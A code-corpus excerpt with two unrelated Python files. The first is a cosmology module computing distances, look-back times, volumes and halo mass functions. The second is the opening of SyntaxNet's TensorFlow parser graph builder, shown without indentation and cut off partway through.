def dL_flat(z, H0=H0_std, omega_m0=omega_m0_std):
dL = (1.0+z) * (c0/H0) * dc(omega_m0, z)
return dL
# Comoving distance for a flat universe with
# omega_matter + omega_lambda = 1
# in Mpc
def dC_flat(z, H0=H0_std, omega_m0=omega_m0_std):
dC = (c0/H0) * dc(omega_m0, z)
return dC
# Angular diameter distance for a flat universe with
# omega_matter + omega_lambda = 1
def dA_flat(z, H0=H0_std, omega_m0=omega_m0_std):
dA = dL_flat(z, H0, omega_m0) / (1.0+z)**2
return dA
# Angular scale distance for a flat universe
arcsec_in_rad = 180*60*60/pi
kpc_in_Mpc = 10**3
ang_scale_conversion = kpc_in_Mpc / arcsec_in_rad
def ang_scale_flat(z, H0=H0_std, omega_m0=omega_m0_std):
# kpc/arcsec
dA = dA_flat(z, H0, omega_m0)
ang_scale = dA * ang_scale_conversion
return ang_scale
# The distance modulus for a classical universe with
# omega_lambda = 0
def dmod_classical(z, H0=H0_classical, q0=q0_classical):
dL = dL_classical(z, H0, q0)
mu = 5.0 * N.log10(dL*1.E6) - 5.0
return mu
# Luminosity distance for a classical universe with
# omega_lambda = 0
# in Mpc
def dL_classical(z, H0=H0_classical, q0=q0_classical):
dL = c0/(H0*q0*q0) * (q0*z + (q0-1.0) * (sqrt(1.0 + 2.0*q0*z)-1.))
return dL
# Angular diameter distance for a classical universe with
# omega_lambda = 0
def dA_classical(z, H0=H0_classical, q0=q0_classical):
dA = dL_classical(z, H0, q0) / (1.0+z)**2
return dA
# calculate comoving distance (to a factor) for a flat lambda universe
# old integration method
def dc_old(omega_m0, z, dz=None):
# probably not very efficient:
# takes 0.25 cpu seconds for z=1.5
# 0.08 cpu seconds for z=0.5
# should use clever integration technique instead
if dz is None: dz = 0.00001
d = 0.0
rom0 = 1.0/omega_m0
rsom0 = 1.0/sqrt(omega_m0)
for z1 in (N.arange(int(z/dz)+1) * dz):
d = d + rsom0 * dz/sqrt((1.0+z1)**3.0 - 1.0 + rom0)
return d
# calculate comoving distance (to a factor) for a flat lambda universe
# improved integration method
def dc_no_array(omega_m0, z):
# function to integrate
rom0 = 1.0/omega_m0
rsom0 = 1.0/sqrt(omega_m0)
def rEz(z1):
return rsom0 / sqrt((1.0+z1)**3.0 - 1.0 + rom0)
d, derr = scipy.integrate.quad(rEz, 0.0, z)
return d
# calculate comoving distance (to a factor) for a flat lambda universe
# improved integration method, added support for arrays
def dc(omega_m0, z):
tz = str(type(z))
if 'float' in tz or 'int' in tz:
z = [z]
z = N.asarray(z)
d = N.zeros(z.shape)
for i, zi in enumerate(z):
# function to integrate
rom0 = 1.0/omega_m0
rsom0 = 1.0/sqrt(omega_m0)
def rEz(z1):
return rsom0 / sqrt((1.0+z1)**3.0 - 1.0 + rom0)
di, dierr = scipy.integrate.quad(rEz, 0.0, zi, limit=100)
d[i] = di
if len(d) == 1:
d = d[0]
return d
# calculate the look-back time for a flat lambda universe
def lt_flat_old(z, H0=H0_std, omega_m0=omega_m0_std, dz=None):
# probably not very efficient
# should use clever integration technique instead
# dz=0.0001 gives an accuracy of 0.01 Gyr for all z
# dz=0.00001 gives an accuracy of 0.001 Gyr for all z
if dz is None: dz = 0.00001
t = 0.0
omega_lambda = 1.0 - omega_m0
for z1 in (N.arange(int(z/dz)+1) * dz):
zfactor = 1.0 + z1
t = t + dz / ( zfactor * sqrt( zfactor**2 * (1+omega_m0*z1) - z1*(2+z1)*omega_lambda ) )
# t currently a fraction of the Hubble time
# convert into Gyr
mperpc = 3.085677581e16
secperday = 31557600
H0persec = H0 * 1.0e-3 / mperpc
H0perGyr = H0persec * secperday * 1.0e9
t = t / H0perGyr
return t
# calculate the look-back time for a flat lambda universe
# improved integration method
def lt_flat(z, H0=H0_std, omega_m0=omega_m0_std):
omega_lambda = 1.0 - omega_m0
z = N.asarray(z)
d = N.zeros(z.shape)
for i, zi in enumerate(z):
# function to integrate
def intfn(z1):
zfactor = 1.0 + z1
return 1.0 / (zfactor * sqrt(zfactor**2 * (1+omega_m0*z1) -
z1*(2+z1)*omega_lambda))
t, terr = scipy.integrate.quad(intfn, 0.0, zi)
# t currently a fraction of the Hubble time
# convert into Gyr
mperpc = 3.085677581e16
secperday = 31557600
H0persec = H0 * 1.0e-3 / mperpc
H0perGyr = H0persec * secperday * 1.0e9
d[i] = t / H0perGyr
if len(d) == 1:
d = d[0]
return d
return t
# calculate age of a flat universe
def age_flat(z, H0=H0_std, omega_m0=omega_m0_std):
mperpc = 3.085677581e16
secperday = 31557600
H0persec = H0 * 1.0e-3 / mperpc
H0perGyr = H0persec * secperday * 1.0e9
soom0 = sqrt(1.0-omega_m0)
age_now = 2.0/(3.0*H0perGyr) * 1.0/(2*soom0) * log((1+soom0)/(1-soom0))
lbt = lt_flat(z, H0, omega_m0)
age = age_now - lbt
return age
# calculate ratio of comoving volume elements at two redshifts
# deduced from MIT astronomy course notes by Edmund Bertschinger, 1999
#http://ocw.mit.edu/NR/rdonlyres/Physics/8-942Fall2001/2F658E61-68A8-40F4-9168-B7AD0E23CA49/0/cosmog.pdf
def vol_ratio(z1, z2, H0=H0_std,
omega_m0=omega_m0_std, omega_lambda0=omega_lambda0_std):
# ratio of comoving volume element at z1 to that at z2
Hz1 = H(z1, H0, omega_m0, omega_lambda0)
Hz2 = H(z2, H0, omega_m0, omega_lambda0)
dc1 = dc(omega_m0, z1)
dc2 = dc(omega_m0, z2)
return Hz2/Hz1 * (dc1/dc2)**2
# calculate the comoving volume enclosed between two redshifts
# deduced from eqn. 9 in Shen et al, 2003, MNRAS, 343, 978
# All-sky, in cubic Mpc
def vol(zmin, zmax, H0=H0_std,
omega_m0=omega_m0_std, omega_lambda0=omega_lambda0_std):
zmax = checkarray(zmax)
zmin = checkarray(zmin)
v = N.zeros(zmax.shape)
# function to integrate
def intfn(z):
return (4*pi * dA_flat(z, H0, omega_m0)**2 * (1+z)**2 * c0 /
H(z, H0, omega_m0, omega_lambda0))
for i in range(len(zmax)):
zmini = zmin[i]
zmaxi = zmax[i]
vi, vierr = scipy.integrate.quadrature(intfn, zmini, zmaxi, tol=1.0e-3, maxiter=100)
# this tol is easily sufficient for any reasonable zmin, zmax
v[i] = vi
if len(v) == 1:
v = v[0]
return v
# calculate the maximum redshift at which an object with absolute
# magnitude mabs could be included in a survey limited to apparent
# magnitude mapplim. Optimised to do many objects in one go.
def zmax(mabs, mapplim, zlow, zhigh, nz=None):
mabs = checkarray(mabs)
if nz is None:
deltaz = 0.001
nz = int((zhigh-zlow)/deltaz)
deltaz = (zhigh-zlow)/float(nz)
zlist = N.arange(zhigh+deltaz/10, zlow, -deltaz)
dmodlist = dmod_flat(zlist)
mabslist = mapplim - dmodlist
i = N.searchsorted(mabslist, mabs, side='left')
ihigh = i == nz+1
N.putmask(i, ihigh, nz)
ilow = i == 0
N.putmask(i, ilow, 1)
z1 = zlist[i-1]
z2 = zlist[i]
m1 = mabslist[i-1]
m2 = mabslist[i]
s = (z2-z1)/(m2-m1)
zmax = z1 + s*(mabs-m1)
N.putmask(zmax, ilow, zhigh)
N.putmask(zmax, ihigh, zlow)
if zmax.shape == (1,):
zmax = zmax[0]
return zmax
# calculate the maximum redshift at which an object with absolute
# size rkpc could be included in a survey limited to apparent
# size raslim. Optimised to do many objects in one go.
def zmax_size(rkpc, raslim, zlow, zhigh, nz=None):
rkpc = checkarray(rkpc)
if nz is None:
deltaz = 0.001
nz = int((zhigh-zlow)/deltaz)
deltaz = (zhigh-zlow)/float(nz)
zlist = N.arange(zlow, zhigh+deltaz/10, deltaz)
angscalelist = ang_scale_flat(zlist)
rkpclist = raslim * angscalelist
i = N.searchsorted(rkpclist, rkpc)
ihigh = i == nz+1
N.putmask(i, ihigh, nz)
ilow = i == 0
N.putmask(i, ilow, 1)
z1 = zlist[i-1]
z2 = zlist[i]
r1 = rkpclist[i-1]
r2 = rkpclist[i]
s = (z2-z1)/(r2-r1)
zmax = z1 + s*(rkpc-r1)
N.putmask(zmax, ilow, zlow)
N.putmask(zmax, ihigh, zhigh)
if zmax.shape == (1,):
zmax = zmax[0]
return zmax
# calculate the maximum redshift at which an object with absolute
# surface brightness sbabs (could be included in a survey limited to
# apparent surface brightness sbapplim.
# Optimised to do many objects in one go.
def zmax_sb(sbabs, sbapplim, zlow, zhigh, nz=None):
sbabs = checkarray(sbabs)
if nz is None:
deltaz = 0.001
nz = int((zhigh-zlow)/deltaz)
deltaz = (zhigh-zlow)/float(nz)
zlist = N.arange(zhigh+deltaz/10, zlow, -deltaz)
dmodlist = dmod_flat(zlist)
angscalelist = ang_scale_flat(zlist)
sbabslist = sbapplim - dmodlist + 2.5*N.log10(angscalelist**2)
i = N.searchsorted(sbabslist, sbabs)
ihigh = i == nz+1
N.putmask(i, ihigh, nz)
ilow = i == 0
N.putmask(i, ilow, 1)
z1 = zlist[i-1]
z2 = zlist[i]
sb1 = sbabslist[i-1]
sb2 = sbabslist[i]
s = (z2-z1)/(sb2-sb1)
zmax = z1 + s*(sbabs-sb1)
N.putmask(zmax, ilow, zhigh)
N.putmask(zmax, ihigh, zlow)
if zmax.shape == (1,):
zmax = zmax[0]
return zmax
#----------------------------------------------------------------------
# Calculate some cosmological structure formation information
# from the equations in Mo & White, 2002, MNRAS, 336, 112.
# calculate the number of haloes per unit comoving volume at
# redshift z with mass in the interval [M, M+dM]
# using the Sheth & Tormen (1999, 2001, 2002) function
def n(M, z, dM,
omega_m0=omega_m0_std, omega_lambda0=omega_lambda0_std):
A = 0.322
a = 0.707
q = 0.3
rho_m0 = omega_m0_std * rho_c(H(z))
nu0 = nu_from_M(M, z, omega_m0, omega_lambda0)
nu1 = nu_from_M(M+dM, z, omega_m0, omega_lambda0)
nu0_primed = sqrt(a) * nu0
print 'nu0_primed:', nu0_primed
nu1_primed = sqrt(a) * nu1
dnu_primed_by_dM = (nu1_primed - nu0_primed) / dM
print 'dnu_primed_by_dM:', dnu_primed_by_dM
term1 = 1.0 + 1.0/(nu0_primed**(2*q))
term2 = sqrt(2.0/pi) * (rho_m0 / M) * dnu_primed_by_dM
term3 = exp(-(nu0_primed**2) / 2.0)
print 'term1:', term1
print 'term2:', term2
print 'term3:', term3
return A * term1 * term2 * term3
# calculate the fraction of all mass in haloes with mass exceeding M
# (eqn. 15)
def F(nu):
return 0.4 * (1.0 + 0.4/(nu**0.4)) * erffc(0.85*nu/sqrt(2))
# calculate the sigmaM corresponding to a given nu,
# the sigma of the halo in terms of a density contrast
def sigmaM_from_nu(nu, z, omega_m0=omega_m0_std, omega_lambda0=omega_lambda0_std):
delta_c = 1.69
return delta_c / (nu * D(z, omega_m0, omega_lambda0))
# calculate nu, the sigma of the halo in terms of a density
# contrast, given sigmaM
def nu_from_M(M, z, H0=H0_std, omega_m0=omega_m0_std, omega_lambda0=omega_lambda0_std):
delta_c = 1.69
R = R_Lagrangian(M, H0, omega_m0)
varM = var(R, H0, omega_m0)
sigmaM = sqrt(varM)
Dz = D(z, omega_m0, omega_lambda0)
print 'Dz:', Dz
print 'sigmaM:', sigmaM
return delta_c / (sigmaM * Dz)
# calculate the growth factor for linear perturbations
# following Carroll, Press & Turner Edwin (1992), as given by
# Mo & White (2002)
def D(z, omega_m0=omega_m0_std, omega_lambda0=omega_lambda0_std):
omega_mz = omega_m(z, omega_m0, omega_lambda0)
omega_lambdaz = omega_lambda(z, omega_m0, omega_lambda0)
return g(z, omega_mz, omega_lambdaz) / (g(0, omega_m0, omega_lambda0) * (1.0+z))
# calculate function used in D (eqn. 10)
def g(z, omega_m, omega_lambda):
term1 = omega_m**(4.0/7.0) - omega_lambda
term2 = (1 + omega_m/2.0)*(1+omega_lambda/70.0)
return (5.0/2.0) * omega_m / (term1 + term2)
# calcuate omega_matter at any redshift (eqn. 2)
def omega_m(z, omega_m0=omega_m0_std, omega_lambda0=omega_lambda0_std):
return omega_m0 * (1.0+z)**3 / (E(z, omega_m0, omega_lambda0)**2)
# calcuate omega_lambda at any redshift (eqn. 11)
def omega_lambda(z, omega_m0=omega_m0_std, omega_lambda0=omega_lambda0_std):
return omega_lambda0 / (E(z, omega_m0, omega_lambda0)**2)
# calculate the factor giving the evolution of the hubble constant
# as a function of redshift (eqn. 3)
def E(z, omega_m0=omega_m0_std, omega_lambda0=omega_lambda0_std):
omega_total = omega_m0 + omega_lambda0
return N.sqrt(omega_lambda0 + (1.0 - omega_total) * (1.0+z)**2 +
omega_m0 * (1.0+z)**3)
# calculate the Hubble constant at any redshift (eqn. 2)
def H(z, H0=H0_std, omega_m0=omega_m0_std, omega_lambda0=omega_lambda0_std):
return H0 * E(z, omega_m0, omega_lambda0)
# calculate Lagrangian radius of a halo of mass M
def R_Lagrangian(M, H0=H0_std, omega_m0=omega_m0_std):
return (3.0 * M / (4 * pi * omega_m0 * rho_c(H0)))**(1.0/3.0)
# calculate critical density of universe given Hubble constant
def rho_c(H):
# H in km s**(-1) Mpc**(-1)
H = H / Mpc_km# s**(-1)
rho = 3.0 * H**2 / (8.0 * pi * G_N) # kg m**(-3)
return rho / M_sun_kg * (Mpc_km * 1000.0)**3 # M_sun Mpc**(-3)
# transfer function representing differential growth since early times
# from Bardeen et al. (1986) as given in Mo & White (2002) eqn. 8.
def T(k, H0=H0_std, omega_m0=omega_m0_std):
q = k / (omega_m0 * (H0/100.0)**2)
if abs(q) < 1.0e-6:
term1 = 1.0
else:
term1 = log(1 + 2.34*q) / (2.34*q)
term2 = 1 + 3.89*q + (16.1*q)**2 + (5.46*q)**3 + (6.71*q)**4
return term1 * term2**(-1.0/4.0)
# approximation of CDM power spectrum (eqn. 7)
def P(k, H0=H0_std, omega_m0=omega_m0_std):
return k * T(k, H0, omega_m0)**2
# calculate normalisation of P
def intP(H0=H0_std, omega_m0=omega_m0_std, dk=None):
if dk is None:
dk = 0.0001
#pgopen('P_func.ps/ps')
k_array = []
term_array = []
sum = 0.0
i = 0
kmax = 0
while 1:
k = (i+0.0)*dk
term = P(k, H0, omega_m0)
sum = sum + term * dk
k_array.append(k)
term_array.append(term)
if i > 0:
if kmax == 0:
if (term / sum) < 0.01:
kmax = i*2
else:
if i >= kmax:
#print 'integration took %i steps'%i
break
#print k, sum, term, term*dk / sum
else:
pass
#print k, sum, term
i = i+1
#k_array = N.array(k_array)
#term_array = N.array(term_array)
#pgenv(0.0, 1.0, 0.0, 12.0)
#pgline(k_array, term_array/sum)
#pgclos()
return sum
# variance of Gaussian density field at a given radius
def var(R, H0=H0_std, omega_m0=omega_m0_std, dk=None):
# this is integrated using a very simple method
# the function consists of a number of similarly spaced,
# decreasing peaks, with only the first three contributing
# significantly to the integral (first is much bigger)
if dk is None:
dk = 0.01 / R # seems to give about 1000 steps and
# decent accuracy (<1%) for 0.03 < R < 100
#f = file('var_func', 'w')
#pgopen('var_func.ps/ps')
#k_array = []
#term_array = []
sum = 0.0
i = 0
kmax = None
while 1:
k = i*dk
term = k**2 * P(k, H0, omega_m0) * W(k*R)**2
sum = sum + term * dk
#f.write('%16.6g%16.6g%16.6g\n'%(k, term, sum))
#k_array.append(k)
#term_array.append(term)
if i > 0:
if kmax is None:
if (term / sum) < 0.01:
# given good sampling provided by choice of dk
# above, this occurs at end of first peak, so
# setting kmax to three times this point gets
# all three significant peaks.
kmax = i*3
else:
if i >= kmax:
#print 'integration took %i steps'%i
break
#print k, sum, term, term*dk / sum
else:
pass
#print k, sum, term
i = i+1
#f.close()
#k_array = N.array(k_array)
#term_array = N.array(term_array)
#pgenv(0.0, k, 0.0, 2.0e-5)
#pgline(k_array, term_array)
#pgclos()
arb_scaling = 1.0e18
return sum / (2.0 * pi**2) / intP() * arb_scaling
# Fourier transform of a top-hat filter with radius R
# for use by var (x=kR)
def W(x):
if x < 1e-6:
return 1.0
else:
return 3.0 * (sin(x) - x*cos(x)) / x**3
| mit | 5,570,644,595,929,895,000 | 31.857411 | 104 | 0.600525 | false |
deepakgupta1313/models | syntaxnet/syntaxnet/graph_builder.py | 1 | 23995 | # Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Builds parser models."""
import tensorflow as tf
import syntaxnet.load_parser_ops
from tensorflow.python.ops import control_flow_ops as cf
from tensorflow.python.ops import state_ops
from tensorflow.python.platform import tf_logging as logging
from syntaxnet.ops import gen_parser_ops
def BatchedSparseToDense(sparse_indices, output_size):
"""Batch compatible sparse to dense conversion.
This is useful for one-hot coded target labels.
Args:
sparse_indices: [batch_size] tensor containing one index per batch
output_size: needed in order to generate the correct dense output
Returns:
A [batch_size, output_size] dense tensor.
"""
eye = tf.diag(tf.fill([output_size], tf.constant(1, tf.float32)))
return tf.nn.embedding_lookup(eye, sparse_indices)
def EmbeddingLookupFeatures(params, sparse_features, allow_weights):
"""Computes embeddings for each entry of sparse features sparse_features.
Args:
params: list of 2D tensors containing vector embeddings
sparse_features: 1D tensor of strings. Each entry is a string encoding of
dist_belief.SparseFeatures, and represents a variable length list of
feature ids, and optionally, corresponding weights values.
allow_weights: boolean to control whether the weights returned from the
SparseFeatures are used to multiply the embeddings.
Returns:
A tensor representing the combined embeddings for the sparse features.
For each entry s in sparse_features, the function looks up the embeddings
for each id and sums them into a single tensor weighing them by the
weight of each id. It returns a tensor with each entry of sparse_features
replaced by this combined embedding.
"""
if not isinstance(params, list):
params = [params]
# Lookup embeddings.
sparse_features = tf.convert_to_tensor(sparse_features)
indices, ids, weights = gen_parser_ops.unpack_sparse_features(sparse_features)
embeddings = tf.nn.embedding_lookup(params, ids)
if allow_weights:
# Multiply by weights, reshaping to allow broadcast.
broadcast_weights_shape = tf.concat_v2([tf.shape(weights), [1]], 0)
embeddings *= tf.reshape(weights, broadcast_weights_shape)
# Sum embeddings by index.
return tf.unsorted_segment_sum(embeddings, indices, tf.size(sparse_features))
class GreedyParser(object):
"""Builds a Chen & Manning style greedy neural net parser.
Builds a graph with an optional reader op connected at one end and
operations needed to train the network on the other. Supports multiple
network instantiations sharing the same parameters and network topology.
The following named nodes are added to the training and eval networks:
epochs: a tensor containing the current epoch number
cost: a tensor containing the current training step cost
gold_actions: a tensor containing actions from gold decoding
feature_endpoints: a list of sparse feature vectors
logits: output of the final layer before computing softmax
The training network also contains:
train_op: an op that executes a single training step
Typical usage:
parser = graph_builder.GreedyParser(num_actions, num_features,
num_feature_ids, embedding_sizes,
hidden_layer_sizes)
parser.AddTraining(task_context, batch_size=5)
with tf.Session('local') as sess:
# This works because the session uses the same default graph as the
# GraphBuilder did.
sess.run(parser.inits.values())
while True:
tf_epoch, _ = sess.run([parser.training['epoch'],
parser.training['train_op']])
if tf_epoch[0] > 0:
break
"""
def __init__(self,
num_actions,
num_features,
num_feature_ids,
embedding_sizes,
hidden_layer_sizes,
seed=None,
gate_gradients=False,
use_locking=False,
embedding_init=1.0,
relu_init=1e-4,
bias_init=0.2,
softmax_init=1e-4,
averaging_decay=0.9999,
use_averaging=True,
check_parameters=True,
check_every=1,
allow_feature_weights=False,
only_train='',
arg_prefix=None,
**unused_kwargs):
"""Initialize the graph builder with parameters defining the network.
Args:
num_actions: int size of the set of parser actions
num_features: int list of dimensions of the feature vectors
num_feature_ids: int list of same length as num_features corresponding to
the sizes of the input feature spaces
embedding_sizes: int list of same length as num_features of the desired
embedding layer sizes
hidden_layer_sizes: int list of desired relu layer sizes; may be empty
seed: optional random initializer seed to enable reproducibility
gate_gradients: if True, gradient updates are computed synchronously,
ensuring consistency and reproducibility
use_locking: if True, use locking to avoid read-write contention when
updating Variables
embedding_init: sets the std dev of normal initializer of embeddings to
embedding_init / embedding_size ** .5
relu_init: sets the std dev of normal initializer of relu weights
to relu_init
bias_init: sets constant initializer of relu bias to bias_init
softmax_init: sets the std dev of normal initializer of softmax init
to softmax_init
averaging_decay: decay for exponential moving average when computing
averaged parameters, set to 1 to do vanilla averaging
use_averaging: whether to use moving averages of parameters during evals
check_parameters: whether to check for NaN/Inf parameters during
training
check_every: checks numerics every check_every steps.
allow_feature_weights: whether feature weights are allowed.
only_train: the comma separated set of parameter names to train. If empty,
all model parameters will be trained.
arg_prefix: prefix for context parameters.
"""
self._num_actions = num_actions
self._num_features = num_features
self._num_feature_ids = num_feature_ids
self._embedding_sizes = embedding_sizes
self._hidden_layer_sizes = hidden_layer_sizes
self._seed = seed
self._gate_gradients = gate_gradients
self._use_locking = use_locking
self._use_averaging = use_averaging
self._check_parameters = check_parameters
self._check_every = check_every
self._allow_feature_weights = allow_feature_weights
self._only_train = set(only_train.split(',')) if only_train else None
self._feature_size = len(embedding_sizes)
self._embedding_init = embedding_init
self._relu_init = relu_init
self._softmax_init = softmax_init
self._arg_prefix = arg_prefix
# Parameters of the network with respect to which training is done.
self.params = {}
# Other variables, with respect to which no training is done, but which we
# nonetheless need to save in order to capture the state of the graph.
self.variables = {}
# Operations to initialize any nodes that require initialization.
self.inits = {}
# Training- and eval-related nodes.
self.training = {}
self.evaluation = {}
self.saver = None
# Nodes to compute moving averages of parameters, called every train step.
self._averaging = {}
self._averaging_decay = averaging_decay
# Pretrained embeddings that can be used instead of constant initializers.
self._pretrained_embeddings = {}
# After the following 'with' statement, we'll be able to re-enter the
# 'params' scope by re-using the self._param_scope member variable. See for
# instance _AddParam.
with tf.name_scope('params') as self._param_scope:
self._relu_bias_init = tf.constant_initializer(bias_init)
@property
def embedding_size(self):
size = 0
for i in range(self._feature_size):
size += self._num_features[i] * self._embedding_sizes[i]
return size
def _AddParam(self,
shape,
dtype,
name,
initializer=None,
return_average=False):
"""Add a model parameter w.r.t. we expect to compute gradients.
_AddParam creates both regular parameters (usually for training) and
averaged nodes (usually for inference). It returns one or the other based
on the 'return_average' arg.
Args:
shape: int list, tensor shape of the parameter to create
dtype: tf.DataType, data type of the parameter
name: string, name of the parameter in the TF graph
initializer: optional initializer for the paramter
return_average: if False, return parameter otherwise return moving average
Returns:
parameter or averaged parameter
"""
if name not in self.params:
step = tf.cast(self.GetStep(), tf.float32)
# Put all parameters and their initializing ops in their own scope
# irrespective of the current scope (training or eval).
with tf.name_scope(self._param_scope):
self.params[name] = tf.get_variable(name, shape, dtype, initializer)
param = self.params[name]
if initializer is not None:
self.inits[name] = state_ops.init_variable(param, initializer)
if self._averaging_decay == 1:
logging.info('Using vanilla averaging of parameters.')
ema = tf.train.ExponentialMovingAverage(decay=(step / (step + 1.0)),
num_updates=None)
else:
ema = tf.train.ExponentialMovingAverage(decay=self._averaging_decay,
num_updates=step)
self._averaging[name + '_avg_update'] = ema.apply([param])
self.variables[name + '_avg_var'] = ema.average(param)
self.inits[name + '_avg_init'] = state_ops.init_variable(
ema.average(param), tf.zeros_initializer)
return (self.variables[name + '_avg_var'] if return_average else
self.params[name])
def GetStep(self):
def OnesInitializer(shape, dtype=tf.float32, partition_info=None):
return tf.ones(shape, dtype)
return self._AddVariable([], tf.int32, 'step', OnesInitializer)
def _AddVariable(self, shape, dtype, name, initializer=None):
if name in self.variables:
return self.variables[name]
self.variables[name] = tf.get_variable(name, shape, dtype, initializer)
if initializer is not None:
self.inits[name] = state_ops.init_variable(self.variables[name],
initializer)
return self.variables[name]
def _ReluWeightInitializer(self):
with tf.name_scope(self._param_scope):
return tf.random_normal_initializer(stddev=self._relu_init,
seed=self._seed)
def _EmbeddingMatrixInitializer(self, index, embedding_size):
if index in self._pretrained_embeddings:
return self._pretrained_embeddings[index]
else:
return tf.random_normal_initializer(
stddev=self._embedding_init / embedding_size**.5,
seed=self._seed)
def _AddEmbedding(self,
features,
num_features,
num_ids,
embedding_size,
index,
return_average=False):
"""Adds an embedding matrix and passes the `features` vector through it."""
embedding_matrix = self._AddParam(
[num_ids, embedding_size],
tf.float32,
'embedding_matrix_%d' % index,
self._EmbeddingMatrixInitializer(index, embedding_size),
return_average=return_average)
embedding = EmbeddingLookupFeatures(embedding_matrix,
tf.reshape(features,
[-1],
name='feature_%d' % index),
self._allow_feature_weights)
return tf.reshape(embedding, [-1, num_features * embedding_size])
def _BuildNetwork(self, feature_endpoints, return_average=False):
"""Builds a feed-forward part of the net given features as input.
The network topology is already defined in the constructor, so multiple
calls to BuildForward build multiple networks whose parameters are all
shared. It is the source of the input features and the use of the output
that distinguishes each network.
Args:
feature_endpoints: tensors with input features to the network
return_average: whether to use moving averages as model parameters
Returns:
logits: output of the final layer before computing softmax
"""
assert len(feature_endpoints) == self._feature_size
# Create embedding layer.
embeddings = []
for i in range(self._feature_size):
embeddings.append(self._AddEmbedding(feature_endpoints[i],
self._num_features[i],
self._num_feature_ids[i],
self._embedding_sizes[i],
i,
return_average=return_average))
last_layer = tf.concat_v2(embeddings, 1)
last_layer_size = self.embedding_size
# Create ReLU layers.
for i, hidden_layer_size in enumerate(self._hidden_layer_sizes):
weights = self._AddParam(
[last_layer_size, hidden_layer_size],
tf.float32,
'weights_%d' % i,
self._ReluWeightInitializer(),
return_average=return_average)
bias = self._AddParam([hidden_layer_size],
tf.float32,
'bias_%d' % i,
self._relu_bias_init,
return_average=return_average)
last_layer = tf.nn.relu_layer(last_layer,
weights,
bias,
name='layer_%d' % i)
last_layer_size = hidden_layer_size
# Create softmax layer.
softmax_weight = self._AddParam(
[last_layer_size, self._num_actions],
tf.float32,
'softmax_weight',
tf.random_normal_initializer(stddev=self._softmax_init,
seed=self._seed),
return_average=return_average)
softmax_bias = self._AddParam(
[self._num_actions],
tf.float32,
'softmax_bias',
tf.zeros_initializer,
return_average=return_average)
logits = tf.nn.xw_plus_b(last_layer,
softmax_weight,
softmax_bias,
name='logits')
return {'logits': logits}
def _AddGoldReader(self, task_context, batch_size, corpus_name):
features, epochs, gold_actions = (
gen_parser_ops.gold_parse_reader(task_context,
self._feature_size,
batch_size,
corpus_name=corpus_name,
arg_prefix=self._arg_prefix))
return {'gold_actions': tf.identity(gold_actions,
name='gold_actions'),
'epochs': tf.identity(epochs,
name='epochs'),
'feature_endpoints': features}
def _AddDecodedReader(self, task_context, batch_size, transition_scores,
corpus_name):
features, epochs, eval_metrics, documents = (
gen_parser_ops.decoded_parse_reader(transition_scores,
task_context,
self._feature_size,
batch_size,
corpus_name=corpus_name,
arg_prefix=self._arg_prefix))
return {'eval_metrics': eval_metrics,
'epochs': tf.identity(epochs,
name='epochs'),
'feature_endpoints': features,
'documents': documents}
def _AddCostFunction(self, batch_size, gold_actions, logits):
"""Cross entropy plus L2 loss on weights and biases of the hidden layers."""
dense_golden = BatchedSparseToDense(gold_actions, self._num_actions)
cross_entropy = tf.div(
tf.reduce_sum(
tf.nn.softmax_cross_entropy_with_logits(
labels=dense_golden, logits=logits)), batch_size)
regularized_params = [tf.nn.l2_loss(p)
for k, p in self.params.items()
if k.startswith('weights') or k.startswith('bias')]
l2_loss = 1e-4 * tf.add_n(regularized_params) if regularized_params else 0
return {'cost': tf.add(cross_entropy, l2_loss, name='cost')}
def AddEvaluation(self,
task_context,
batch_size,
evaluation_max_steps=300,
corpus_name='documents'):
"""Builds the forward network only without the training operation.
Args:
task_context: file path from which to read the task context.
batch_size: batch size to request from reader op.
evaluation_max_steps: max number of parsing actions during evaluation,
only used in beam parsing.
corpus_name: name of the task input to read parses from.
Returns:
Dictionary of named eval nodes.
"""
def _AssignTransitionScores():
return tf.assign(nodes['transition_scores'],
nodes['logits'], validate_shape=False)
def _Pass():
return tf.constant(-1.0)
unused_evaluation_max_steps = evaluation_max_steps
with tf.name_scope('evaluation'):
nodes = self.evaluation
nodes['transition_scores'] = self._AddVariable(
[batch_size, self._num_actions], tf.float32, 'transition_scores',
tf.constant_initializer(-1.0))
nodes.update(self._AddDecodedReader(task_context, batch_size, nodes[
'transition_scores'], corpus_name))
nodes.update(self._BuildNetwork(nodes['feature_endpoints'],
return_average=self._use_averaging))
nodes['eval_metrics'] = cf.with_dependencies(
[tf.cond(tf.greater(tf.size(nodes['logits']), 0),
_AssignTransitionScores, _Pass)],
nodes['eval_metrics'], name='eval_metrics')
return nodes
def _IncrementCounter(self, counter):
return state_ops.assign_add(counter, 1, use_locking=True)
def _AddLearningRate(self, initial_learning_rate, decay_steps):
"""Returns a learning rate that decays by 0.96 every decay_steps.
Args:
initial_learning_rate: initial value of the learning rate
decay_steps: decay by 0.96 every this many steps
Returns:
learning rate variable.
"""
step = self.GetStep()
return cf.with_dependencies(
[self._IncrementCounter(step)],
tf.train.exponential_decay(initial_learning_rate,
step,
decay_steps,
0.96,
staircase=True))
def AddPretrainedEmbeddings(self, index, embeddings_path, task_context):
"""Embeddings at the given index will be set to pretrained values."""
def _Initializer(shape, dtype=tf.float32, partition_info=None):
unused_dtype = dtype
t = gen_parser_ops.word_embedding_initializer(
vectors=embeddings_path,
task_context=task_context,
embedding_init=self._embedding_init)
t.set_shape(shape)
return t
self._pretrained_embeddings[index] = _Initializer
def AddTraining(self,
task_context,
batch_size,
learning_rate=0.1,
decay_steps=4000,
momentum=0.9,
corpus_name='documents'):
"""Builds a trainer to minimize the cross entropy cost function.
Args:
task_context: file path from which to read the task context
batch_size: batch size to request from reader op
learning_rate: initial value of the learning rate
decay_steps: decay learning rate by 0.96 every this many steps
momentum: momentum parameter used when training with momentum
corpus_name: name of the task input to read parses from
Returns:
Dictionary of named training nodes.
"""
with tf.name_scope('training'):
nodes = self.training
nodes.update(self._AddGoldReader(task_context, batch_size, corpus_name))
nodes.update(self._BuildNetwork(nodes['feature_endpoints'],
return_average=False))
nodes.update(self._AddCostFunction(batch_size, nodes['gold_actions'],
nodes['logits']))
# Add the optimizer
if self._only_train:
